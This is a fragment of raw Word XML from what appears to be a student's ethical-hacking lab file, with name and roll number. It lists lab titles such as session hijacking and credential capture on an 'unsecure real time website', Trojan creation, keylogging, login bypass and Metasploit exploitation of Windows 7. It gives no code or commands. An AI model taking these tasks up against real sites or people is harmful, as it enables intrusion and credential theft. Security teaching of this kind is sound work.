            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="33FF159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5BEC577C"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14E52623"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35F4CA6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0B04D7E3"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53DAE17A"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32A005E0" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="628B57E2" w14:textId="027F1619"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4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16B769A6" w14:textId="5CAD28DB" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:kern w:val="36"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Use Nessus tool to find all the vulnerabilities with its level and generate a report for an organization</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="155CB20A"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2026EDF8"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10840FC0"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355CE54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47D3EAC5"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27E26095"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197E2381" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="400E42BC" w14:textId="607F7B92"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5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7A052E99" w14:textId="77777777" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:spacing w:after="0"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Install Wireshark and apply filters to gather different information</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7E22F066" w14:textId="33D9AA01" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:color w:val="000000"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Perform Session hijacking/ find credentials of unsecure real time website using Wireshark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D6D6B8C"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09C3A25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3136C9B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1DE4D4C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6EC3E70D"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6C83DB3A"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3B7FC481" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1724C0D7" w14:textId="15B47C9E"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6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7806BBB0" w14:textId="405BBD1C" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:spacing w:val="-15"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Create Trojan and Exploit victim’s machine by taking its complete access</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="355B48F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0A0C346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114438F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014AA09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26FEBB0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155A1261"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623210C0" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2FA25FF8" w14:textId="481D6515"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lastRenderedPageBreak/>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="034879D3" w14:textId="1A729F5C" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Track keystrokes of victim machine using Keylogger</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0E76472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6A938EA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39D4D9CA"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35B3DF8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5093A41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4B0A38CE"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3C84DD7F" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="35B96E64" w14:textId="2ABBAC80"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8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3A584B23" w14:textId="77777777" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:pBdr>
                <w:top w:val="nil"/>
                <w:left w:val="nil"/>
                <w:bottom w:val="nil"/>
                <w:right w:val="nil"/>
                <w:between w:val="nil"/>
              </w:pBdr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Execute basic commands of Linux. Use CHMOD command to change the privileges and permissions</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="25CCC799" w14:textId="684758D3" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Generate Word list from using wordlist generator ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3C12072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1AAA5E4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14F0B413"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7138F94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31C09B86"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451B1F1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7EC07CC3" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50321BB1" w14:textId="7CD5641E"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9</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2D5D24E0" w14:textId="14279210" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Perform Windows Login Bypass in virtual machine</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="695C7B77"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1BF9791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4CA85B86"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71CC0589"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3AFD3B27"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1FD30DAE"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22948A58" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2A5C148E" w14:textId="31D0D333"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10</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="298D5AB6" w14:textId="4D1B2982" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Perform Kali Linux Login Bypass in virtual machine </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2EDDCAC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0DB88218"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7A6391B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58DAA9E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57B5874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6A1429CD"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2384FD99" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="37F8F791" w14:textId="2F1A9A0F"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11</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="653E5A14" w14:textId="261434D3" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploit windows to gain access of victim’s machine using Metasploit framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="24129A6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78B9C218"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095815C6"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1347F492"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4A7E3BE3"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67CC4BCE"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r w:rsidR="009F4601" w:rsidRPr="001C411D" w14:paraId="451E45FB" w14:textId="77777777" w:rsidTr="00BE293D">
        <w:trPr>
          <w:trHeight w:val="906"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="866" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1A8F2CAE" w14:textId="308BE254" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1847" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="01B1D845" w14:textId="703B38E6" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Arial" w:hAnsi="Arial" w:cs="Arial"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Exploit Windows 7 using Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="813" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EC2865E"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31" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27A9799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500" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2BA9DA70"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952" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2E2DD2F4"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134" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2F02B36F"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c>
          <w:tcPr>
            <w:tcW w:w="1360" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="15AA662B" w14:textId="77777777" w:rsidR="009F4601" w:rsidRPr="001C411D" w:rsidRDefault="009F4601" w:rsidP="009F4601">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:sz w:val="24"/>
                <w:szCs w:val="24"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="397F39A7" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="00EB52E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="60D39C66" w14:textId="77777777" w:rsidR="00EB52E8" w:rsidRPr="001C411D" w:rsidRDefault="00EB52E8" w:rsidP="00EB52E8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="48A1F7E3" w14:textId="1A980B49" w:rsidR="0013063B" w:rsidRPr="001C411D" w:rsidRDefault="00181640" w:rsidP="00EF04B3">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C411D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
      <w:r w:rsidR="0013063B" w:rsidRPr="001C411D">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1C411D" w14:paraId="0824E1C1" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="08AF89CC" w14:textId="791BD4E4"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Student Name and Roll Number:</w:t>
            </w:r>
            <w:r w:rsidR="00AA1334" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AA1334" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Piyush Gambhir – 21CSU349</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="514611C7"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52D61095" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="09F55028" w14:textId="7375739C"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Semester /Section:</w:t>
            </w:r>
            <w:r w:rsidR="00AA1334" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00AA1334" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Semester-IV</w:t>
            </w:r>
            <w:r w:rsidR="00517C0D" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> – AIML-B (AL-3)</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="2310B3FF"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18D42E68" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="794700E3" w14:textId="2C9E3DCB"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r w:rsidR="00F51647">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve">  </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="33F9FFB9"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6807B526" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1F3FA773" w14:textId="7BE1148A"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Date:</w:t>
            </w:r>
            <w:r w:rsidR="00517C0D" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="0013063B" w:rsidRPr="001C411D" w14:paraId="69C76A3B" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="20EC25A9" w14:textId="627A43BB"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1E6D7FAA"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6ED8E0B9" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9795" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0BC4600C" w14:textId="79BC2B20"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07A56323"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bl>
    <w:p w14:paraId="1131FD17" w14:textId="77777777" w:rsidR="0013063B" w:rsidRPr="001C411D"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1C411D" w14:paraId="2166AF6A" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="45C713C7" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="0013063B" w:rsidP="0034147C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>Objective</w:t>
            </w:r>
            <w:r w:rsidR="00643144" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>(s)</w:t>
            </w:r>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
            <w:r w:rsidR="00F3558E" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="014E8A85" w14:textId="77777777" w:rsidR="00A90352" w:rsidRPr="001C411D" w:rsidRDefault="00A90352" w:rsidP="0034147C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3D24BFE5" w14:textId="77777777" w:rsidR="00643144" w:rsidRPr="001C411D" w:rsidRDefault="0034147C" w:rsidP="0034147C">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:color w:val="000000"/>
                <w:lang w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t>To familiarize the students with the first phase of Penetration Testing.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="45E29B25"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24CEBEBF" w14:textId="77777777" w:rsidTr="00F3558E">
        <w:trPr>
          <w:trHeight w:val="319"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9829" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
            <w:noWrap/>
            <w:vAlign w:val="bottom"/>
          </w:tcPr>
          <w:p w14:paraId="7B64283B" w14:textId="77777777" w:rsidR="00DF4764"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r w:rsidR="00F3558E" w:rsidRPr="001C411D">
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="000000"/>
                <w:lang w:val="en-IN" w:eastAsia="en-IN"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
